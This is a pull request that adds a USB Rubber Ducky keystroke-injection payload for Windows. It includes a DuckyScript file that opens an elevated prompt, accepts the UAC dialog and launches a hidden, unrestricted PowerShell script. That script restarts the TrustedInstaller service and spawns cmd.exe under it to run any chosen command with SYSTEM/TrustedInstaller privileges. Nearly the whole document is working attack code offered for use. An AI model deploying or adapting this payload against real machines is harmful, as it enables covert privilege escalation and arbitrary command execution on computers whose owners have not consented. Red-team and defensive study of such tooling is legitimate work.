### PR TITLE
Execute commands as SYSTEM with TrustedInstaller privileges

### DIFF
--- a/payloads/library/execution/Win_Get-TrustedInstaller/README.md
+++ b/payloads/library/execution/Win_Get-TrustedInstaller/README.md
@@ -1,0 +1,43 @@
+# "Microsoft Windows" Get TrustedInstaller
+
+- Title:         Execute commands as 'NT AUTHORITY\SYSTEM' with 'TrustedInstaller' privileges
+- Author:        TW-D
+- Version:       1.0
+- Category:      Execution
+
+## Description
+
+Launch a new cmd.exe process with elevated privileges under TrustedInstaller,
+by setting the TrustedInstaller process as the parent, the cmd.exe process inherits TrustedInstaller's privileges.
+
+For more information, follow: [The Art of Becoming TrustedInstaller](https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html)
+
+## Tested On
+
+>
+> Microsoft Windows 10 Professionnel 22H2
+>
+
+__Note :__ *The target user must belong to the 'Administrator' group.*
+
+## Configuration
+
+In the "payload.txt" file, replace the values of the following constants :
+
+```
+
+REM ---
+REM USB Rubber Ducky label.
+REM ---
+DEFINE #RD_LABEL DUCKY
+
+REM ---
+REM TrustedInstaller initial command.
+REM ---
+DEFINE #TRUSTEDINSTALLER_COMMAND "WHOAMI /ALL"
+
+```
+
+## Usage
+
+At the root of the USB Rubber Ducky, copy the "TrustedInstaller.ps1" file.

--- a/payloads/library/execution/Win_Get-TrustedInstaller/TrustedInstaller.ps1
+++ b/payloads/library/execution/Win_Get-TrustedInstaller/TrustedInstaller.ps1
@@ -1,0 +1,79 @@
+﻿<#
+    .AUTHOR
+        TW-D
+
+    .VERSION
+        1.0
+
+    .NOTES
+        - This script requires administrative rights on the system to successfully install the module and execute the commands.
+        - If the `NtObjectManager` module is already installed, it will be imported without being reinstalled.
+        - Spawning a `cmd.exe` process with elevated privileges under its parent process `TrustedInstaller`.
+#>
+
+Param (
+    [Parameter(Position = 0, Mandatory = $true)]
+    [ValidateNotNullOrEmpty()]
+    [string] $Command
+)
+
+If (([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
+
+    $MODULE_NAME = "NtObjectManager"
+    $MODULE_VERSION = "1.1.32"
+
+    # Check if the NtObjectManager module is installed
+    $NtObjectManager = Get-InstalledModule -Name $MODULE_NAME -ErrorAction SilentlyContinue
+
+    # If the module is not found, try to install it
+    If ($NtObjectManager -eq $null) {
+        Try {
+            # Install the NtObjectManager module with a specific version
+            Install-Module -Name $MODULE_NAME -RequiredVersion $MODULE_VERSION -Force
+        } Catch {
+            # If installation fails
+            Write-Error "$_"
+        }
+    }
+
+    # Attempt to import the NtObjectManager module
+    Try {
+        # Force import of the module to ensure it is loaded in the environment
+        Import-Module NtObjectManager -Force
+    } Catch {
+        # If the import fails
+        Write-Error "$_"
+    }
+
+    # Attempt to manage the TrustedInstaller service and launch a cmd.exe process with elevated privileges under its parent process
+    Try {
+        # Get the status of the TrustedInstaller service
+        $TrustedInstaller = Get-Service -Name "TrustedInstaller" -ErrorAction SilentlyContinue
+
+        # If the TrustedInstaller service exist, configure and stop it
+        If ($TrustedInstaller) {
+            C:\Windows\System32\sc.exe stop TrustedInstaller | Out-Null
+        }
+
+        # Configure the TrustedInstaller service by setting its binary path
+        C:\Windows\System32\sc.exe config TrustedInstaller binPath= "C:\Windows\servicing\TrustedInstaller.exe" | Out-Null
+
+        # Start the TrustedInstaller service
+        C:\Windows\System32\sc.exe start TrustedInstaller | Out-Null
+
+        # Get the TrustedInstaller process to use it as the parent process for cmd.exe
+        $TrustedInstaller = Get-NtProcess "TrustedInstaller.exe" -ErrorAction Stop
+
+        # Launch a new cmd.exe process with elevated privileges under TrustedInstaller,
+        # by setting the TrustedInstaller process as the parent, the cmd.exe process inherits TrustedInstaller's privileges.
+        New-Win32Process -CommandLine "C:\Windows\System32\cmd.exe /K ${Command}" -CreationFlags NewConsole -ParentProcess $TrustedInstaller | Out-Null
+    } Catch {
+        # If an error occurs at any stage
+        Write-Error "$_"
+    }
+
+    #
+    # Commented-out section to uninstall the NtObjectManager module after execution (if necessary)
+    # Uninstall-Module -Name $MODULE_NAME -RequiredVersion $MODULE_VERSION -Force
+    #
+}

--- a/payloads/library/execution/Win_Get-TrustedInstaller/payload.txt
+++ b/payloads/library/execution/Win_Get-TrustedInstaller/payload.txt
@@ -39,9 +39,7 @@ STRING CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveL
 DELAY 1000
 CTRL-SHIFT ENTER
 DELAY 2000
-LEFTARROW
-DELAY 1000
-ENTER
+ALT y
 DELAY 2000
 STRINGLN powershell -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Unrestricted -File "%RD_LABEL%\TrustedInstaller.ps1" -Command #TRUSTEDINSTALLER_COMMAND
 

--- a/payloads/library/execution/Win_Get-TrustedInstaller/payload.txt
+++ b/payloads/library/execution/Win_Get-TrustedInstaller/payload.txt
@@ -1,0 +1,48 @@
+REM TITLE : Execute commands as 'NT AUTHORITY\SYSTEM' with 'TrustedInstaller' privileges
+REM AUTHOR : TW-D
+REM DESCRIPTION :
+REM - Launch a new cmd.exe process with elevated privileges under TrustedInstaller,
+REM - by setting the TrustedInstaller process as the parent, the cmd.exe process inherits TrustedInstaller's privileges.
+REM TARGET : Microsoft Windows
+REM VERSION : 1.0
+REM CATEGORY : Execution
+REM REQUIREMENT : DuckyScript 3.0
+
+ATTACKMODE HID STORAGE
+DELAY 8000
+
+REM ---
+REM USB Rubber Ducky label.
+REM ---
+DEFINE #RD_LABEL DUCKY
+
+REM ---
+REM TrustedInstaller initial command.
+REM ---
+DEFINE #TRUSTEDINSTALLER_COMMAND "WHOAMI /ALL"
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+
+IF ( $_CAPSLOCK_ON ) THEN
+    CAPSLOCK
+    DELAY 500
+END_IF
+
+IF ( $_NUMLOCK_ON == FALSE ) THEN
+    NUMLOCK
+    DELAY 500
+END_IF
+
+GUI r
+DELAY 2000
+STRING CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
+DELAY 1000
+CTRL-SHIFT ENTER
+DELAY 2000
+LEFTARROW
+DELAY 1000
+ENTER
+DELAY 2000
+STRINGLN powershell -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Unrestricted -File "%RD_LABEL%\TrustedInstaller.ps1" -Command #TRUSTEDINSTALLER_COMMAND
+
+RESTORE_HOST_KEYBOARD_LOCK_STATE


### PR DESCRIPTION
- Title:         Execute commands as 'NT AUTHORITY\SYSTEM' with 'TrustedInstaller' privileges
- Author:        TW-D
- Version:       1.0
- Category:      Execution

Launch a new cmd.exe process with elevated privileges under TrustedInstaller,
by setting the TrustedInstaller process as the parent, the cmd.exe process inherits TrustedInstaller's privileges.